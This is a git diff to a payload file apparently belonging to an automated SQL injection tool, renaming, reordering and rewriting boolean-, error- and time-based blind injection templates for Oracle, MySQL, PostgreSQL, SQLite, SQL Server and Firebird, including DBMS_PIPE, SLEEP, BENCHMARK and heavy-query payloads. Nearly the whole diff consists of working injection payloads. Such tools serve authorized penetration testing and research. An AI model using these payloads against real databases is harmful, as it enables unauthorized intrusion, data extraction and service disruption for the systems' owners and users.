diff --git a/xml/payloads.xml b/xml/payloads.xml
index 47fdb8833..4b58b65b1 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -235,7 +235,7 @@ Formats:
3
1
1,2
- 1
+ 2
'
@@ -244,7 +244,7 @@ Formats:
4
1
1,2
- 1
+ 2
')
@@ -253,7 +253,7 @@ Formats:
5
1
1,2
- 1
+ 4
"
@@ -540,8 +540,6 @@ Formats:
-
-
Generic boolean-based blind - Parameter replace
1
@@ -634,12 +632,11 @@ Formats:
Oracle
+
-
-
Generic boolean-based blind - GROUP BY and ORDER BY clauses
1
@@ -732,6 +729,8 @@ Formats:
Oracle
+
+
@@ -794,7 +793,7 @@ Formats:
- Oracle AND error-based - WHERE clause
+ Oracle AND error-based - WHERE clause (XMLType)
2
1
0
@@ -929,7 +928,7 @@ Formats:
- Oracle OR error-based - WHERE clause
+ Oracle OR error-based - WHERE clause (XMLType)
2
2
2
@@ -970,10 +969,10 @@ Formats:
Oracle OR error-based - WHERE clause (ctxsys.drithsx.sn)
2
- 3
- 0
+ 4
+ 2
1
- 1
+ 2
OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM], '[DELIMITER_START]'||(%s)||'[DELIMITER_STOP]')
OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))
@@ -1195,10 +1194,10 @@ Formats:
-
+
MySQL > 5.0.11 stacked queries
@@ -1209,7 +1208,7 @@ Formats:
1
; SELECT SLEEP([SLEEPTIME]);
- --
+ #
@@ -1221,7 +1220,7 @@ Formats:
- MySQL < 5.0.12 stacked queries
+ MySQL < 5.0.12 stacked queries (heavy query)
4
2
0
@@ -1229,7 +1228,7 @@ Formats:
1
; SELECT BENCHMARK(5000000, MD5('[SLEEPTIME]'));
- --
+ #
@@ -1260,14 +1259,14 @@ Formats:
- PostgreSQL < 8.2 stacked queries (EXISTS)
+ PostgreSQL < 8.2 stacked queries (heavy query)
4
3
0
0
1
- ; SELECT [RANDNUM] WHERE EXISTS(SELECT * FROM GENERATE_SERIES(1, 3000000));
+ ; SELECT [RANDNUM] WHERE EXISTS(SELECT * FROM GENERATE_SERIES(1, 30000000));
--
@@ -1377,7 +1376,7 @@ Formats:
- SQLite > 2.0 stacked queries
+ SQLite > 2.0 stacked queries (heavy query)
4
3
0
@@ -1397,7 +1396,7 @@ Formats:
- Firebird stacked queries
+ Firebird stacked queries (heavy query)
4
3
0
@@ -1441,7 +1440,7 @@ Formats:
- MySQL < 5.0.12 AND time-based blind
+ MySQL < 5.0.12 AND time-based blind (heavy query)
5
2
1
@@ -1460,45 +1459,7 @@ Formats:
- Oracle AND time-based blind
- 5
- 1
- 1
- 1,2,3
- 1
- AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)
-
- AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
-
-
-
-
-
- Oracle
-
-
-
-
- Oracle AND time-based blind (heavy query)
- 5
- 2
- 1
- 1,2,3
- 1
- AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) ELSE [RANDNUM] END)
-
- AND [RANDNUM]=(SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)
-
-
-
-
-
- Oracle
-
-
-
-
- PostgreSQL AND time-based blind
+ PostgreSQL AND time-based blind (heavy query)
5
1
1
@@ -1506,7 +1467,7 @@ Formats:
1
AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1, 3000000)) ELSE [RANDNUM] END)
- AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1, 3000000))
+ AND EXISTS(SELECT * FROM GENERATE_SERIES(1, 30000000))
@@ -1536,13 +1497,50 @@ Formats:
- SQLite > 2.0 AND time-based blind
+ Oracle AND time-based blind
+ 5
+ 1
+ 1
+ 1,2,3
+ 1
+ AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)
+
+ AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]', [SLEEPTIME])
+
+
+
+
+
+ Oracle
+
+
+
+
+ Oracle AND time-based blind (heavy query)
+ 5
+ 2
+ 1
+ 1,2,3
+ 1
+ AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) ELSE [RANDNUM] END)
+
+ AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)>0
+
+
+
+
+
+ Oracle
+
+
+
+
+ SQLite > 2.0 AND time-based blind (heavy query)
5
3
1
1
1
-
AND LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))
@@ -1600,7 +1598,7 @@ Formats:
- MySQL < 5.0.12 OR time-based blind
+ MySQL < 5.0.12 OR time-based blind (heavy query)
5
3
3
@@ -1618,6 +1616,44 @@ Formats:
+
+ PostgreSQL OR time-based blind (heavy query)
+ 5
+ 3
+ 3
+ 1,2,3
+ 2
+ OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1, 3000000)) ELSE [RANDNUM] END)
+
+ OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1, 3000000))
+
+
+
+
+
+ PostgreSQL
+
+
+
+
+ Microsoft SQL Server/Sybase OR time-based blind (heavy query)
+ 5
+ 3
+ 3
+ 1,2,3
+ 2
+ OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END)
+
+ OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7)
+
+
+
+
+
+ Microsoft SQL Server
+
+
+
Oracle OR time-based blind
5
@@ -1657,51 +1693,12 @@ Formats:
- PostgreSQL OR time-based blind
- 5
- 3
- 3
- 1,2,3
- 2
- OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1, 3000000)) ELSE [RANDNUM] END)
-
- OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1, 3000000))
-
-
-
-
-
- PostgreSQL
-
-
-
-
- Microsoft SQL Server/Sybase OR time-based blind (heavy query)
- 5
- 3
- 3
- 1,2,3
- 2
- OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END)
-
- OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7)
-
-
-
-
-
- Microsoft SQL Server
-
-
-
-
- SQLite > 2.0 OR time-based blind
+ SQLite > 2.0 OR time-based blind (heavy query)
5
4
3
1
1
-
OR LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))